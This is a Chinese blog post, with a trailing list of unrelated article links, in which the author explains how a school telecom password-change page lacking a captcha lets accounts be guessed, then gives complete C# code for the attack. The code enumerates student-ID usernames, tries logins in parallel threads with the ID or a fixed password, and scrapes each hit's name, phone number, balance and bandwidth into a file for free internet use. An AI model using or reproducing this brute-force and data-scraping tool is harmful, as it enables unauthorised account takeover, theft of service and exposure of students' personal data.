c#实现对登陆信息的反馈,实现对网站登录密码的扫描
最近发现我们学校的电信上网改密码的页面很简单,没有验证码,于是我就很好奇,后来发现原来是我们学校的电信的那个改密码的页面有漏洞于是就可以通过扫描账号免费上网
原理就是对修改密码的页面进行POST请求
如果密码账号正确就返回200
下面是C#的网络操作类
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
using System.Text.RegularExpressions; namespace scan
{
public class zzHttp
{
private const string sContentType = "application/x-www-form-urlencoded";
private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"; public static string Send(string data, string url)
{
return Send(Encoding.GetEncoding("UTF-8").GetBytes(data), url);
} public static string Send(byte[] data, string url)
{
Stream responseStream;
HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
if (request == null)
{ throw new ApplicationException(string.Format("Invalid url string: {0}", url));
}
// request.UserAgent = sUserAgent;
request.ContentType = sContentType;
request.Method = "POST";
request.ContentLength = data.Length;
Stream requestStream = request.GetRequestStream();
requestStream.Write(data, 0, data.Length);
requestStream.Close();
try
{
responseStream = request.GetResponse().GetResponseStream();
}
catch (Exception exception)
{ throw exception;
}
string str = string.Empty;
using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding("UTF-8")))
{
str = reader.ReadToEnd();
}
responseStream.Close();
return str;
} #region 同步通过POST方式发送数据
/// <summary>
/// 通过POST方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">Post数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = postDataStr.Length;
//request.Timeout = 1000;
//request.ReadWriteTimeout = 3000;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(postDataStr);
myStreamWriter.Close();
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("gb2312"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
} #endregion
#region 同步通过GET方式发送数据
/// <summary>
/// 通过GET方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">GET数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url + (postDataStr == "" ? "" : "?") + postDataStr);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "GET";
request.ContentType = "text/html;charset=UTF-8";
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("utf-8"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
}
#endregion public string zzget(string Url,string getdata, string type)
{
try
{
System.Net.WebRequest wReq = System.Net.WebRequest.Create(Url + (getdata == "" ? "" : "?") + getdata);
// Get the response instance.
wReq.Method = "GET";
wReq.ContentType = "text/html;charset=UTF-8";
System.Net.WebResponse wResp = wReq.GetResponse();
System.IO.Stream respStream = wResp.GetResponseStream();
// Dim reader As StreamReader = New StreamReader(respStream)
using (System.IO.StreamReader reader = new System.IO.StreamReader(respStream, Encoding.GetEncoding(type)))
{
return reader.ReadToEnd();
}
}
catch (System.Exception ex)
{
//errorMsg = ex.Message;
}
return "";
} ///<summary>
///采用post发送请求
///</summary>
///<param name="URL">url地址</param>
///<param name="strPostdata">发送的数据</param>
///<returns></returns>
public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)
{ //IDictionary<string, Object> idc = new Dictionary<string, object>();
StringBuilder data = new StringBuilder();
foreach (KeyValuePair<string, Object> param in strPostdata)
{
data.Append(param.Key).Append("=");
data.Append(param.Value.ToString());
data.Append("&");
}
data.Remove(data.Length- 1,1);
Encoding encoding = Encoding.Default; HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
request.CookieContainer = new CookieContainer();//少了这句就不能登录
request.Method = "post";
request.Accept = "text/html, application/xhtml+xml, */*";
request.ContentType = "application/x-www-form-urlencoded";
byte[] buffer = encoding.GetBytes(data.ToString());
request.ContentLength = buffer.Length;
request.GetRequestStream().Write(buffer, 0, buffer.Length);
/*
request.ContentLength = data.Length;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(data);
myStreamWriter.Close();
*/
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
using (StreamReader reader = new StreamReader(response.GetResponseStream(), System.Text.Encoding.GetEncoding(strEncoding)))
{
return reader.ReadToEnd();
} } /// <summary>
/// 清除文本中Html的标签
/// </summary>
/// <param name="Content"></param>
/// <returns></returns>
public static string ClearHtml(string Content)
{
Content = Zxj_ReplaceHtml("&#[^>]*;", "", Content);
Content = Zxj_ReplaceHtml("</?marquee[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?object[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?param[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?embed[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?table[^>]*>", "", Content);
Content = Zxj_ReplaceHtml(" ", "", Content);
Content = Zxj_ReplaceHtml("</?tr[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?p[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?a[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?img[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?tbody[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?li[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?span[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?div[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?td[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?script[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("(javascript|jscript|vbscript|vbs):", "", Content);
Content = Zxj_ReplaceHtml("on(mouse|exit|error|click|key)", "", Content);
Content = Zxj_ReplaceHtml("<\\?xml[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("<\\/?[a-z]+:[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?font[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?b[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?u[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?i[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content); Content = Zxj_ReplaceHtml(" ", "", Content);
Regex r = new Regex(@"\s+");
Content = r.Replace(Content, ""); Content.Trim();
string clearHtml = Content;
return clearHtml;
} /// <summary>
/// 清除文本中的Html标签
/// </summary>
/// <param name="patrn">要替换的标签正则表达式</param>
/// <param name="strRep">替换为的内容</param>
/// <param name="content">要替换的内容</param>
/// <returns></returns>
private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)
{
if (string.IsNullOrEmpty(content))
{
content = "";
}
Regex rgEx = new Regex(patrn, RegexOptions.IgnoreCase);
string strTxt = rgEx.Replace(content, strRep);
return strTxt;
} }
}
然后对某个网址进行post请求
//开始扫描
public void scan()
{
bool flag = false;
object[] V= GetValue();
string no = V[0].ToString();
string userpass = V[1].ToString();
int cnum = int.Parse(V[2].ToString());
int snum = int.Parse(V[3].ToString()); if (userpass.Length <= 0)
flag = true;
zzHttp http = new zzHttp();
string url = "这儿填你需要的网址";
//统计线程数
ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess)); //检查线程是否结束
rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);
int begin = int.Parse(beginclass.Text);
int end = int.Parse(endclass.Text);
for (int m = begin; m <= end; m++)//扫描不同年级
{ for (int j = 1; j <= cnum; j++)
{
string tmp = "";
if (j < 10)
tmp = m + no + "0" + j;
else
tmp = m + no + j;
for (int i = 1; i <= snum; i++)
{
string tempstuno = "";//构造出来的学号
if (i < 10)
tempstuno = tmp + "0" + i;
else
tempstuno = tmp + i;
AddAccountMessage( tempstuno + "<正在检查...>");
if (flag)
{
scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);
// threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
else
{
scanuser s = new scanuser(http, url, tempstuno, userpass, this);
//threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
//threadReceive.Start();
}
}
}
}
下面是扫描类
//扫描类
class scanuser
{
public Form1 F = null;
zzHttp http;
string url;
string username;
string userpass;
//判断一个用户的用户名和密码是否正确的
public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)
{
this.F = F;
this.http = http;
this.username = username;
this.userpass = userpass;
this.url = url;
}
//登录
public void login(Object stateInfo)
{
string postdata = String.Format("name={0}&password={1}", username, userpass);
CookieContainer cookie = new CookieContainer();
try
{
string ret = http.SendDataByPost(url, postdata, ref cookie); if (ret.Contains("客户名称"))
{
ret = zzHttp.ClearHtml(ret);//去掉多余的html
//获取姓名
int pos = ret.LastIndexOf("客户名称");
string name = ret.Substring(pos + 5, 2);//两个字姓名
string tmp = ret.Substring(pos + 7, 1);//第三个字
if (tmp != "联")
name = name + tmp;
//获取手机号
pos = ret.LastIndexOf("联系电话");
string tel = ret.Substring(pos + 5, 11);
Regex regex = new Regex("^1\\d{10}$");
if (!regex.IsMatch(tel))
tel = "无";
//获取预存款
pos = ret.LastIndexOf("预存款余额(RMB)");
string money = ret.Substring(pos + 11,5);
tmp = ret.Substring(pos+16,1);
if (tmp != "<")
money += tmp; //获取带宽 先判断有没有备注 string width = "2M";
if (ret.Contains("独享"))
{
if (ret.Contains("4M"))
width = "4M";
else if (ret.Contains("6M"))
width = "6M";
else if (ret.Contains("8M"))
width = "8M";
else if (ret.Contains("12M"))
width = "12M"; }
if (ret.Contains("有效"))
{ //F.AddScanMessage("\n");
F.Setcolor(Color.Green);
F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");
write_txt(username,userpass,name,width);
}
else if (ret.Contains("停机"))
{
//F.AddScanMessage("\n");
F.Setcolor(Color.Red);
F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");
}
}
}catch(Exception ex)
{
F.Setcolor(Color.Yellow);
F.AddScanMessage("网络故障..."+ex.Message);
}
}
}
c#实现对登陆信息的反馈,实现对网站登录密码的扫描的更多相关文章
- arcgismanager登陆信息不对
arcgis版本:arcgis10 安装arcgis server后(java版的win764位系统),发现arcgis管理器登陆界面(http://localhost:8099/arcgismana ...
- [转]mvc3 使用session来存储类来存储用户登陆信息
mvc3 使用session来存储类来存储用户登陆信息 2013-08-26 09:48:56| 分类: NET开发 |举报 |字号 订阅 项目之前的登陆机制是这样的:用户登陆后初始化一个类,类 ...
- java的web项目中使用cookie保存用户登陆信息
本文转自:http://lever0066.iteye.com/blog/1735963 最近在编写论坛系统的实现,其中就涉及到用户登陆后保持会话直到浏览器关闭,同时可以使用cookie保存登陆信息以 ...
- linux 用户登陆信息查询
1.查看命令历史 每个用户都有一份命令历史记录 查看$HOME/.bash_history 或者在终端输入: history 2.last命令 查看用户登录历史 此命令会读取 /var/log/wtm ...
- python 网页爬虫,带登陆信息
注意点: 1. 用Fiddler抓取登陆后的headers,cookies; 2. 每抓取一次网页暂停一点时间防止反爬虫; 3. 抓取前,需要关闭Fiddler以防止端口占用. 还需解决的问题: 爬取 ...
- linux查看当前用户登陆信息
@(Linux基础)[linux查看当前用户登陆信息] linux查看当前用户登陆信息 作为系统管理员,你可能经常会(在某个时候)需要查看系统中有哪些用户正在活动.有些时候,你甚至需要知道他(她)们正 ...
- 【转】修改Ubuntu系统的登陆信息的简单方法
转自http://www.jb51.net/os/Ubuntu/414663.html Ubuntu的登陆和欢迎信息控制/etc/issue和/etc/motd/etc/issue与/etc/motd ...
- 利用websocket实现手机扫码登陆后,同步登陆信息到web端页面
新手必看 广播系统 事件系统 准备工作 初始化项目 引入 laravel-websockets 软件包 启动 websocket 监听 主要流程 创建两个页面 建立 socket 连接 手机端扫码登陆 ...
- ubuntu修改登录信息(本机和SSH登录)
1.需要修改的主要文件和目录如下:/etc/issue/etc/motd/etc/update-motd.d//etc/issue.net 2.Ubuntu的登陆和欢迎信息控制主要在/etc/issu ...
随机推荐
- SSH secure shell 权威指南(转载)
本书是一本介绍通信安全的书籍,如果你想保障你的通信安全,本书能给你一个很好的解决方案.本书从ssh协议介绍起,到具体的开源实现和商业实现.但本书同时介绍开源实现和商业实现,给人感觉比较乱.注意:由于o ...
- docker镜像文件导入与导出,支持批量
工作中经常需要拉取一些国外的镜像,但是网络限制等原因在公司拉取很慢,所以我习惯用亚马逊服务器拉取镜像,导出后下载到本地再导入开发环境 1. 查看镜像id sudo docker images REPO ...
- Python第一弹--------初步了解Python
Python是一种跨平台的语言,这意味着它能够运行在所有主要的操作系统中. 语法规范几乎同C语言. 字符串: 当像Python输入一个字符串时,首先要输入一个引号.单引号.双引号.三引号三者等价.通常 ...
- 5.6 Components -- Handling User Interaction with Actions
1. 组件允许你定义可以在整个应用程序中重用的控件.如果它们够通用,它们也可以在被共享给其他人并且在许多应用程序中被使用. 2. 为了使一个可重用的控件有用,然而,你首先需要你的应用程序的用户和它交互 ...
- OA项目_环境搭建
OA项目现在要做成微服务,用的框架是springboot,所用的编程工具是idea,maven,做为一个程序员最关心的就是我需要在那个架包中编写代码,我们只需关注domain,repository,s ...
- mysql锁机制之综述(一)
https://zhuanlan.zhihu.com/p/29150809 一.数据库有锁机制的原因. 数据库锁定机制简单来说,就是数据库为了保证数据的一致性和有效性,而使各种共享资源在被并发访问变得 ...
- linux系统下单网卡绑定多个IP地址方法
说明: 操作系统:CentOS 6.2 IP地址:192.168.21.164 子网掩码:255.255.255.0 网关:192.168.21.2 问题: 现在要增加一个IP地址:192.168.2 ...
- python 字典(dict)get方法应用
如果我们需要获取字典值的话,我们有两种方法,一个是通过dict['key'],另外一个就是dict.get()方法. 今天给大家分享的就是字典的get()方法. 这里我们可以用字典做一个小游戏,假设用 ...
- 获取WebView加载的网页内容并进行动态修改
http://www.jianshu.com/p/3f207a8e32cb [Android]WebView读取本地图片 http://www.cnblogs.com/kimmy/p/4769788. ...
- 20145118 《Java程序设计》 第2周学习总结
20145118 <Java程序设计> 第2周学习总结 教材学习内容总结 起初翻开课本看到第三章的章节题目”基础语法”时,我就明白这是一章需要我们牢牢掌握并理解的学科.通过看课本我了解到, ...